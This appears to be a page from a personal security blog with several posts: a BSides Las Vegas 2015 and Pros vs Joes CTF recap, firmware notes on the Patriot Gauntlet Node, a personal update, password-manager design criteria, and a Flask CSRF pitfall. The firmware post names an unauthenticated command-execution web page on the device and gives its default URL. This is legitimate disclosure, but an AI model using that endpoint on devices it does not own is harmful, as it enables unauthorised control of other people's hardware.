System Overlord

A blog about security engineering, research, and general hacking.

Hacker Summer Camp 2015: BSides LV & Pros vs Joes CTF

I’ve just returned from Las Vegas for the annual “hacker summer camp”, and am going to be putting up a series of blog posts covering the week. Tuesday and Wednesday were BSides Las Vegas. For the uninitiated, BSides was founded as the “flip side” to Black Hat, and has spawned into a series of community organized and oriented conferences around the globe. Entrance to BSides LV was free, but you could guarantee a spot by donating in advance if you were so inclined. (I was.)

As regular readers know, I play a little bit of CTF (Capture the Flag), and BSides LV is home to one of the most unique CTF competitions I’ve ever played in: the “Pros vs Joes” CTF run by dichotomy. This CTF pits multiple defending teams (Blue Cells), each consisting of Joes + 1 Pro Captain, against a “Red Cell” consisting of professional penetration testers. Even though I work in security, my focus is on Application Security and not Network Security (which PvJ highly emphasizes) so I’ve never felt comfortable playing as a pro. Consequently, this was my 3rd year as a “Joe” in the PvJ CTF. (Maybe one day I can make it through my Impostor Syndrome).

If you’re not familiar with this CTF, here’s the rundown: on the first day, each blue cell defends their network against attack by the red cell. For the blue cells, the first day is entirely defense. On the 2nd day, the red cell is “dissolved” into the blue cells. Each blue cell gained two new pros and it was blue cell vs blue cells, so we had to take on the role of both attacker and defender. It’s great fun and requires a ton of work to set up, so my hat goes off to dichotomy for organizing and running it all.

Though I’ve played in the past, this year brought new challenges and experiences. Firstly, there was significant integration between the CTF and the Social Engineering CTF. (Apparently even more than I realized when playing.) This brough interesting components, such as people trying to social engineer information out of us or get us to help them with tasks for the SECTF, but it also brough challenges, the most significant of which was people who joined the CTF solely to gain information to help them with the SECTF. It’s my hope that next year, team captains will be allowed to “fire” team members that are obviously attempting to “leak” information.

There were other changes as well. In the past, there were two blue cells and one red cell, this year dichotomy managed to up it to a whopping four blue cells! This brought us a total of 44 players, which was obviously no small feat for both dichotomy and the conference organizers. There was also a greater emphasis on the use of “tickets” in the scoring system. Now, I’m not a fan of the tickets myself. Most of them consist of boring inventory or asset management work, and it’s often not clear exactly what response is expected to them. Hopefully this is the sort of thing that will be tweaked by next year. (As it was, the scoring tweaks dichotomy made to the ticket system between the first and second day were a welcome improvement.)

By far, however, the most interesting change to me was obvious even upon walking in the room. As soon as I saw the tables, I noticed something new: SIP phones on each table. Yes, they were connected. To a PBX. That was in scope. And had default credentials. That was definitely new – and not something most of the teams picked up on.

All things considered, I feel that my team (“Endtroducing”) did pretty well with a 2nd place finish. The first place team just seemed unbeatable. I don’t know if it was a different ratio of attack/defense, luck, different skills or what, but it worked out well for them.

In the next week or so, I’ll be writing a blue team player’s guide based on my 3 years of experience. It’ll expose some things about the play environment that have been constant for the 3 years, some tactics I’ve used, and just some general guidance on preparing for the Pros vs Joes CTF.


Playing with the Patriot Gauntlet Node (Part 2)

Despite the fact that it’s been over 2 years since I posted Part 1, I got bored and decided I should take another look at the Patriot Gauntlet Node. So I go and grab the latest firmware from Patriot’s website (V21_1.2.4.6) and use the same binwalk techniques described in the first post, I extracted the latest firmware.

So, the TL;DR is: It’s unexciting because Patriot makes no effort to secure the device. It seems that their security model is “if you’re on the network, you own the device”, which is pretty much the case. Not only can you enable telnet as I’ve discussed before, there’s even a convenient web-based interface to run commands: http://10.10.10.254:8088/adm/system_command.asp. Oh, and it’s not authenticated. Even if you set an admin password (which is hidden at http://10.10.10.254:8088/adm/management.asp).

The device runs two webservers: on port 80 you have httpd from busybox, and on port 8088, you have a proprietary embedded webserver called GoAhead. It uses not ASP, as the file extensions would have you believe, but actually uses an embedded JavaScript interpreter called Ejscript to generate active pages.

I don’t intend to spend much more time on this device from a security PoV: it doesn’t seem intended to be secure at all, so it’s not like there’s anything to break. The device is essentially pre-rooted, so go to town and have fun!


Lack of Updates, Turning 30

I’ve been disappointed with myself for a while for not updating more often. It’s been months! I’d been pushing myself to update regularly, but I also only want to update with genuine content. Social networks are places where I can just place random thoughts, this is a place for meaningful content that will (hopefully) be useful to others. (Though the jury’s still out on that one.)

Part of the reason for the lack of updates is burnout. For one reason or another, I just haven’t been feeling myself for a while, and so haven’t been doing as many interesting things. Some of this burnout is due to the nature of things I’ve been doing at work, but it wouldn’t be fair to blame all of it on work.

I’ve also been dealing with some (potential) health issues. Mostly it’s been a case of symptoms with no obvious cause, which is even more maddening to me. Despite reassurances from doctors, I can’t help but have a nagging feeling that something is actually wrong. It’s quite the distraction, psychologically.

So, in more timely news, I’ve made the transition from “20s” to “30s” (two weeks ago). When I was 25, I posted asking if 25 was old, because I felt like I hadn’t accomplished anything. Though I think I’ve accomplished a few things in the interceding time, I’m not convinced it was 5 quality years worth. I need to get better at prioritizing my time and making sure that I use my time in good ways. I’d like to make sure I’m either doing something I enjoy, something meaningful, or something helpful to others. Anything else is just a waste of precious time.


Towards a Better Password Manager

The consensus in the security community is that passwords suck, but they’re here to stay, at least for a while longer. Given breaches like Adobe, …, it’s becoming more and more evident that the biggest threat is not weak passwords, but password reuse. Of course, the solution to password to reuse is to use one password for every site that requires you to log in. The problem is that your average user has dozens of online accounts, and they probably can’t remember those dozens of passwords. So, we build tools to help people remember passwords, mostly password managers, but do we build them well?

I don’t think so. But before I look at the password managers that are out there, it’s important to define the criteria that a good password manager would meet.

  1. Use well-understood encryption to protect the data. A good password manager should use cryptographic constructions that are well understood and reviewed. Ideally, it would build upon existing cryptographic libraries or full cryptosystems. This includes the KDF (Key-derivation function) as well as encryption of the data itself. Oh, and all of the data should be encrypted, not just the passwords.

  2. The source should be auditable. No binaries, no compressed/minified Javascript. If built in a compiled language, it should have source available with verifiable builds. If built in an interpreted language, the source should be unobfuscated and readable. Not everyone will audit their password manager, but it should be possible.

  3. The file format should be open. The data should be stored in an open, documented, format, allowing for interoperability. Your passwords should not be tired into a particular manager, whether that’s because the developer of that manager abandoned it, or because it’s not supported on a particular platform, or because you like a blue background instead of grey.

  4. It should integrate with the browser. Yes, there are some concerns about exposing the password manager within the browser, but it’s more important that this be highly usable. That includes making it easy to generate passwords, easy to fill passwords, and most importantly: harder to phish. In-browser password managers can compare the origin of the page you’re on to the data stored, so users are less likely to enter their password in the wrong page. With a separate password manager, users generally copy/paste their passwords into a login page, which relies on the user to ensure they’re putting their password into the right site.

  5. Sync, if offered, should be independent to encryption. Your encryption passphrase should not be used for sync. In fact, your encryption passphrase should never be sent to the provider: not at signup, not at login, not ever. Sync, unfortunately, sounds simple: drop a file in Dropbox or Google Drive, right? What happens if the file gets updated while the password manager is open? How do changes get synced if two clients are open?

These are just the five most important features as I see them, and not a comprehensive design document for password managers. I’ve yet to find a manager that meets all of these criteria, but I’m hoping we’re moving in this direction.


Dangers of decorator-based registries in Python

So Flask has a really convenient mechanism for registering handlers, actions to be run before/after requests, etc. Using decorators, Flask registers these functions to be called, as in:

1
2
3
4
5
6
7
8
#!python
@app.route('/')
def homepage_handler():
    return 'Hello World'

@app.before_request
def do_something_before_each_request():
    ...

This is pretty convenient, and works really well, because it means you don’t have to list all your routes in one place (like Django requires) but it comes with a cost. You can end up with Python modules that are only needed for the side effects of importing them. No functions from those modules are directly called from your other modules, but they still need to be imported somewhere to get the routes registered.

Of course, if you import a module just to get its side effects, then pylint won’t be aware you need this import, and will helpfully suggest that you remove it. This generally isn’t too bad, if you remove a file with views defined in it, they’ll just fail, you’ll notice quickly, and readd the import.

On the other hand, if you’re using a before_request function to, say, provide CSRF protection, then you’ll have a serious problem. Of course, that’s the case I found myself in. So, you’ll want to make sure that doesn’t occur and use a resource from the file or disable pylint.